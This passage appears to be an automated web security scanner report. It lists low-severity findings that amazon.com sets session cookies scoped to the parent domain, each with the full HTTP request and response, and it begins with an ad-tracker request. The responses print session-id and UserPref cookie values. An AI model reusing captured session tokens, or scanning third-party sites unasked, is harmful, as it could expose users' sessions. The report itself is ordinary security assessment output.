GET /t/v1/imp?%25&migAgencyId=111&migSource=adsrv2&migTrackDataExt=2356384;58746736;233909482;38657313&migRandom=2148129&migTrackFmtExt=client;io;ad;crtv HTTP/1.1
Host: t.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.91;sz=120x600;pc=[TPAS_ID];ord=[timestamp]?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:35:44 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: session=1295919344|1295919344; path=/; domain=.mookie1.com
Content-Length: 35
Content-Type: image/gif

GIF87a.............,...........D..;

13.4. http://www.amazon.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • session-id=183-0141411-2666057; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • skin=noskin; path=/; domain=.amazon.com; expires=Tue, 25-Jan-2011 14:04:22 GMT
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:04:22 GMT
Server: Server
Set-Cookie: skin=noskin; path=/; domain=.amazon.com; expires=Tue, 25-Jan-2011 14:04:22 GMT
x-amz-id-1: 0SBFNHA40PDAQCKXW60Q
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: qBgIWFuA2Wjoamon8NoAG9bdAoR3KqlibGyFaWE7CQvIKyPWqQkJunDX652P1Cp2
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=183-0141411-2666057; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 141800


<html>
<head>


<style type="text/css"><!--


BODY { font-family: verdana,arial,helvetica,sans-serif; font-size: x-small; background-color: #FF
...[SNIP]...

13.5. http://www.amazon.com/Kindle-Wireless-Reader-Wifi-Graphite/dp/B002Y27P3M/x22

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /Kindle-Wireless-Reader-Wifi-Graphite/dp/B002Y27P3M/x22

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • session-id=191-9849773-1831958; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Kindle-Wireless-Reader-Wifi-Graphite/dp/B002Y27P3M/x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:35 GMT
Server: Server
x-amz-id-1: 0FSERHCXPR6RX175GC9Y
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: kR10u+vmtmJMjH8b0QtzQOA7YFXccTCuWSFp6hNB3ud9u6GhHvfORZRd53Wds1YX
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=191-9849773-1831958; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 738612


<html>
<head>


<style type="text/css"><!--


BODY { font
...[SNIP]...

13.6. http://www.amazon.com/Kindle-Wireless-Reading-Device-Display/dp/B0015T963C/x22

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /Kindle-Wireless-Reading-Device-Display/dp/B0015T963C/x22

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • session-id=187-6920967-0553225; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Kindle-Wireless-Reading-Device-Display/dp/B0015T963C/x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:34 GMT
Server: Server
x-amz-id-1: 1X3EPAT3ZMNVCSGSMBAN
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: XWFESHf4LDfW4Q4jtyPNlMZUcPixPfxkYZBCrWieQtkwWSKt/X54SoeJ/bATZoKW
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=187-6920967-0553225; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 508145


<html>
<head>


<style type="text/css"><!--


BODY { font
...[SNIP]...

13.7. http://www.amazon.com/b/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /b/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • session-id=184-9752175-3585404; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NotFound
Date: Mon, 24 Jan 2011 16:03:36 GMT
Server: Server
x-amz-id-1: 1Z8842RFJJQ53HA29PKK
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: Thz+3TyDFYah1x3ei6oQr/mo+vx0XErnPjJ/ljJngQIg1o7JCKD0eSlBevy55XTo
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=184-9752175-3585404; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 16144


<html>
<head>

<style type="text/css"><!--
.serif { font-family: times,serif; font-size: small; }
.sans { font-family: verdana,arial,helvetica,sans-serif; font-size: small; }
.small { font-fami
...[SNIP]...

13.8. http://www.amazon.com/books-used-books-textbooks/b

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /books-used-books-textbooks/b

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • session-id=175-9805255-9723637; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /books-used-books-textbooks/b HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NotFound
Date: Mon, 24 Jan 2011 16:03:25 GMT
Server: Server
x-amz-id-1: 0PN0C1SZEXY20ARQ0EZ7
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: Crev47aQfB2uqb2X//rUO4Hxdev3PyQ/5jNKWV00peXpTx5B0oH6Vgmw1c8EiiK+
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=175-9805255-9723637; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 16144


<html>
<head>

<style type="text/css"><!--
.serif { font-family: times,serif; font-size: small; }
.sans { font-family: verdana,arial,helvetica,sans-serif; font-size: small; }
.small { font-fami
...[SNIP]...

13.9. http://www.amazon.com/dp/0313363153

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /dp/0313363153

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • session-id=188-3368164-3583051; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • UserPref=cNF169Ic3p+FLZlmECYIuJwUEnmMidNZpqOMXJlzFfyGkoLR/f0WF8vs6ZQU5HX+qBwE7qqoL3t9fdNtjPj3gyYsZ9OPP64Bj28wuj43iGA+RQm2aZs0leyoMSaGWoAmLLFT4m57m2mg/M9gT8m8zgH4Tc7xnQpx7XV0ybHDfWS2rJ30owc8Rfy1J4pUKTmIEUgNrK9xS2pwjtjSqsQvCH98yL0TxvhtC5sb3N+5Hsbf09QrIa+pq7nenC2PQqxud5/rAY2tUqp08BC6AQqUm9FRfG4U//pmCE8P+Nf4Ay6b7r0qWful6/GAXYGc9NJ8UFNtl8lIxNbvvKSGUwWxMFhHe2yFoXqfgLXGtAif6/GMRqdmxDwAFvFgrcU5U0NDFanauf5u8xPOR/t4Rw9yAVQVnhKW/N98x8jGOU9360lRgvHsw0R7W92mPEKiYj0h57Jn/qFxIY4=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:06:18 2011 GMT
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dp/0313363153?tag=parenthoodcom-20&camp=211493&creative=379981&linkCode=op1&creativeASIN=0313363153&adid=1E43GGA9XAJKCAEXAPNZ& HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:06:18 GMT
Server: Server
x-amz-id-1: 1XEKQW5VKEVTKXS2HSJA
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: XeWIrG239x/NdCZhKVLDJEcUlefLzu6eYfgdzbR7oX4dl76GDeDVLHHKaEiGy4dJ
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=188-3368164-3583051; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=cNF169Ic3p+FLZlmECYIuJwUEnmMidNZpqOMXJlzFfyGkoLR/f0WF8vs6ZQU5HX+qBwE7qqoL3t9fdNtjPj3gyYsZ9OPP64Bj28wuj43iGA+RQm2aZs0leyoMSaGWoAmLLFT4m57m2mg/M9gT8m8zgH4Tc7xnQpx7XV0ybHDfWS2rJ30owc8Rfy1J4pUKTmIEUgNrK9xS2pwjtjSqsQvCH98yL0TxvhtC5sb3N+5Hsbf09QrIa+pq7nenC2PQqxud5/rAY2tUqp08BC6AQqUm9FRfG4U//pmCE8P+Nf4Ay6b7r0qWful6/GAXYGc9NJ8UFNtl8lIxNbvvKSGUwWxMFhHe2yFoXqfgLXGtAif6/GMRqdmxDwAFvFgrcU5U0NDFanauf5u8xPOR/t4Rw9yAVQVnhKW/N98x8jGOU9360lRgvHsw0R7W92mPEKiYj0h57Jn/qFxIY4=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:06:18 2011 GMT
Content-Length: 369008


<html>
<head>


<style type="text/css"><!--


BODY { font-
...[SNIP]...

13.10. http://www.amazon.com/dp/0814410960

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /dp/0814410960

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • session-id=176-7210136-6598218; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • UserPref=y3NkdEGeLcNmXCUiBl72zia0IgOUlzJisM6ejtj6++wAzjFW+0MbDLrBrMTYId5ScAAIGSpPr8ov4wvfMrz16qkoExEE846LElBHdCDq1wJ5G3PyH/8+t8ULEiTMRJzZ+/UmohvS0s1wbtQLhB5tRJaj+v9Qvdikv5wA8Z+9BSaQuNwa25tYVL3brZaSaxoPnkAsz7sFby/Vm3IEdAyCOCgmDlA7LSKWp7BGexnTvAm3XJETeqxNVJ4XDLyzD9mn489zuGO7Hr1Q5jDtdTkD7MsDhmN6H6NA+BAMoVhXzdj8ywD6RaU+CKSyhgSibHDJfiAf99mXgDVIui4kc0MR8MKRTBSKmuzQBaMCl0Pf98laS7P8B1wibfy99GA8Gxn4ZYxd9IYn+0IOEpAUVtWvSy3VhH2tV4F6FYuFOflVaV1k+o8nZAdjmsVsH/6mMkOtJfcsZt8CR0o=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:05:31 2011 GMT
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dp/0814410960?tag=parenthoodcom-20&camp=211493&creative=379981&linkCode=op1&creativeASIN=0814410960&adid=1E43GGA9XAJKCAEXAPNZ& HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:05:30 GMT
Server: Server
x-amz-id-1: 0V1X9WNQCM47PDADFQGC
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: SKWOpw071+vUvE/zvz84QekiVG202hXgMiv2MgQFljVkajAJe9OwpyfODLjeHTmR
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=176-7210136-6598218; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=y3NkdEGeLcNmXCUiBl72zia0IgOUlzJisM6ejtj6++wAzjFW+0MbDLrBrMTYId5ScAAIGSpPr8ov4wvfMrz16qkoExEE846LElBHdCDq1wJ5G3PyH/8+t8ULEiTMRJzZ+/UmohvS0s1wbtQLhB5tRJaj+v9Qvdikv5wA8Z+9BSaQuNwa25tYVL3brZaSaxoPnkAsz7sFby/Vm3IEdAyCOCgmDlA7LSKWp7BGexnTvAm3XJETeqxNVJ4XDLyzD9mn489zuGO7Hr1Q5jDtdTkD7MsDhmN6H6NA+BAMoVhXzdj8ywD6RaU+CKSyhgSibHDJfiAf99mXgDVIui4kc0MR8MKRTBSKmuzQBaMCl0Pf98laS7P8B1wibfy99GA8Gxn4ZYxd9IYn+0IOEpAUVtWvSy3VhH2tV4F6FYuFOflVaV1k+o8nZAdjmsVsH/6mMkOtJfcsZt8CR0o=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:05:31 2011 GMT
Content-Length: 398021


<html>
<head>


<style type="text/css"><!--


BODY { font-
...[SNIP]...

13.11. http://www.amazon.com/dp/B000EFAO1G

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /dp/B000EFAO1G

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • session-id=183-0598759-1123006; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • UserPref=5+EPReZ8AKa7WMIFgy9cHbJVm/9tgaQgv25tnd2EAaj3A2TcoX3BYNQp+U2mBhaH6NNnCCgyjvtkzGGKQPpSQ8YmQMO5JCKLveLlxt9MugLIEpGsQ9/N5+Fno+1FBJOzE7k6DdNtiYO1TD+phGkOUWQ/bAQscWvK7bSH45/y7GXOXIwlbx9HtoYer2qT3bQI/XgRYyDrwUk/3MaxWfXupPISlccJHK+MMD1RlV2PpGnjij8hwxwPu8lFWY2ZyFBuWpfgJTPLmLB81bUuXAJVuEItWLbeo9hG152TFm3xHDssaIPB8rAFW82FLjl1caASZ+3mXZbbwjY5FdvZ3bSUoEYv4rJBnYTCCcuaPY0qDbp0lBhPOVi0eyvDVbNk4+/Hftrx7HmCu7QjCyC5NYd3aS1DdMQsjfynRE0x7QVCx6RwexxPari5JWk0LW4Q/jcI4R+KwxWl55I=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:04:26 2011 GMT
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dp/B000EFAO1G?tag=parenthoodcom-20&camp=211493&creative=379969&linkCode=op1&creativeASIN=B000EFAO1G&adid=0GZGV3PX406SYA9DGF7Q& HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:04:26 GMT
Server: Server
x-amz-id-1: 09N75F9VXRTTHCJ6W4N0
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: BhM/yiIeeNmHNPnM+XNOpz2cQi2I5DL2kxxjVh9EGVEK3Otk7l2KJ92BEBUF6OSA
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=183-0598759-1123006; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=5+EPReZ8AKa7WMIFgy9cHbJVm/9tgaQgv25tnd2EAaj3A2TcoX3BYNQp+U2mBhaH6NNnCCgyjvtkzGGKQPpSQ8YmQMO5JCKLveLlxt9MugLIEpGsQ9/N5+Fno+1FBJOzE7k6DdNtiYO1TD+phGkOUWQ/bAQscWvK7bSH45/y7GXOXIwlbx9HtoYer2qT3bQI/XgRYyDrwUk/3MaxWfXupPISlccJHK+MMD1RlV2PpGnjij8hwxwPu8lFWY2ZyFBuWpfgJTPLmLB81bUuXAJVuEItWLbeo9hG152TFm3xHDssaIPB8rAFW82FLjl1caASZ+3mXZbbwjY5FdvZ3bSUoEYv4rJBnYTCCcuaPY0qDbp0lBhPOVi0eyvDVbNk4+/Hftrx7HmCu7QjCyC5NYd3aS1DdMQsjfynRE0x7QVCx6RwexxPari5JWk0LW4Q/jcI4R+KwxWl55I=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:04:26 2011 GMT
Content-Length: 378947


<html>
<head>


<style type="text/css"><!--


BODY { fo
...[SNIP]...

13.12. http://www.amazon.com/dp/B001AIM6V2

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /dp/B001AIM6V2

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • session-id=183-9936733-9404845; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • UserPref=gpJo3CBiqTqDVIjaNvl4zvNYaep1x/cFw36XGdvu+t3AZoNYj5i0ue/20d7C2ZC+I33rSpZQv0bL0wk1Ew8YoO+rtNcIBPKLYOhOlxvFtzRIdn3kvGu6M4tMOkmBEeryBbTVlsJzSNcfMpAFM/xng7ZCP9yYT0m2OdKey3rxmCeD+Fl0AmJvQvFSHWkk425/o8Da9DpaI74WLGaJ7uNOvo6JLwZb5sYP9TvVnm5hmJQsWKXZoF2OyiWVivGgzTAUd6pRUIbYAZkt1sGVL+jil+zZfxZVnjBewrBhOy9v7AhUD8T6SoAGbb4KE5ZJBYWH2OXsSjuLHVIc52YxHzs6raEMD1dV4RY1XTDpsD0MSkGHFH6QBIcq1zDxTwlTMAha08n0zKNwM+cU9SxT/rymeyJe0yjBe5km9qvYTfgoBDkuOc+G0APo8cpXuSfIyagOnBt68PFK8so=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:05:21 2011 GMT
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dp/B001AIM6V2?tag=parenthoodcom-20&camp=211493&creative=379981&linkCode=op1&creativeASIN=B001AIM6V2&adid=1E43GGA9XAJKCAEXAPNZ& HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:05:20 GMT
Server: Server
x-amz-id-1: 0JE81R4J15T5AK071TZV
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: 4o8GRyUKmn3DkY5PnyV64O2bpKKjAgNwr+I4JvwWlUHgakGrnSAutbBsj2pwvLzy
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=183-9936733-9404845; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=gpJo3CBiqTqDVIjaNvl4zvNYaep1x/cFw36XGdvu+t3AZoNYj5i0ue/20d7C2ZC+I33rSpZQv0bL0wk1Ew8YoO+rtNcIBPKLYOhOlxvFtzRIdn3kvGu6M4tMOkmBEeryBbTVlsJzSNcfMpAFM/xng7ZCP9yYT0m2OdKey3rxmCeD+Fl0AmJvQvFSHWkk425/o8Da9DpaI74WLGaJ7uNOvo6JLwZb5sYP9TvVnm5hmJQsWKXZoF2OyiWVivGgzTAUd6pRUIbYAZkt1sGVL+jil+zZfxZVnjBewrBhOy9v7AhUD8T6SoAGbb4KE5ZJBYWH2OXsSjuLHVIc52YxHzs6raEMD1dV4RY1XTDpsD0MSkGHFH6QBIcq1zDxTwlTMAha08n0zKNwM+cU9SxT/rymeyJe0yjBe5km9qvYTfgoBDkuOc+G0APo8cpXuSfIyagOnBt68PFK8so=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:05:21 2011 GMT
Content-Length: 243877


<html>
<head>


<style type="text/css"><!--


BODY { fon
...[SNIP]...

13.13. http://www.amazon.com/dp/B0037UT1LY

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /dp/B0037UT1LY

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • session-id=188-3953038-0825847; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • UserPref=bK6rGx+CGyD+cP8GmimTlX4yOKqJEvwu6UnJY2SjL1UcG5vQjcyPPRSMkmQN8sbphtWyqe3kQNCI8rylaXXfj7BtPqZ81YiplXuRUKMy3Z/2mvrL0RV2OkiG88oBA7HbQe9Kd7fvezmpNGVnUs/WKVjx/v0XDHsIO3F31lrklY6f9VkJODasmR+vrmz5jfMxq2bRIKLa3TnEq25JcifPmFz90PVXykz/U8VHJ0uNE7A+Lbt2L2Z/SjjIzqMfkvaEaJ5CGm8K5P8lXwVh0vUHjthXVRSI9Cep53mqSnG9l0pUNqqdm4ZhxMz2Fnam7evwK9iiJKrdcr/H6916sNYxoaW3SE1y+GzhrAbM2j5TccGcCjdm1TEIUPGgRv1ET/0d7xHLJPqSIn5j3GRpNMwhQIwtYGX6XK/au2mTa3txsuMyDFNmteb/ybxsSFJKnNmQPriNDYGWivE=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:04:34 2011 GMT
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dp/B0037UT1LY?tag=parenthoodcom-20&camp=211493&creative=379981&linkCode=op1&creativeASIN=B0037UT1LY&adid=1E43GGA9XAJKCAEXAPNZ& HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:04:34 GMT
Server: Server
x-amz-id-1: 17DR8YMYSFMRZS8CDJ3Y
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: VnWywM5oGusSEKwA0oEmF9YQZW0sC+3d/bn1D6tOPMIwmjnxiuAhufUUuKPMm5+U
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=188-3953038-0825847; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=bK6rGx+CGyD+cP8GmimTlX4yOKqJEvwu6UnJY2SjL1UcG5vQjcyPPRSMkmQN8sbphtWyqe3kQNCI8rylaXXfj7BtPqZ81YiplXuRUKMy3Z/2mvrL0RV2OkiG88oBA7HbQe9Kd7fvezmpNGVnUs/WKVjx/v0XDHsIO3F31lrklY6f9VkJODasmR+vrmz5jfMxq2bRIKLa3TnEq25JcifPmFz90PVXykz/U8VHJ0uNE7A+Lbt2L2Z/SjjIzqMfkvaEaJ5CGm8K5P8lXwVh0vUHjthXVRSI9Cep53mqSnG9l0pUNqqdm4ZhxMz2Fnam7evwK9iiJKrdcr/H6916sNYxoaW3SE1y+GzhrAbM2j5TccGcCjdm1TEIUPGgRv1ET/0d7xHLJPqSIn5j3GRpNMwhQIwtYGX6XK/au2mTa3txsuMyDFNmteb/ybxsSFJKnNmQPriNDYGWivE=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:04:34 2011 GMT
Content-Length: 440777


<html>
<head>


<style type="text/css"><!--


BODY { font
...[SNIP]...

13.14. http://www.amazon.com/dvds-used-hd-action-comedy-oscar/b

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /dvds-used-hd-action-comedy-oscar/b

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
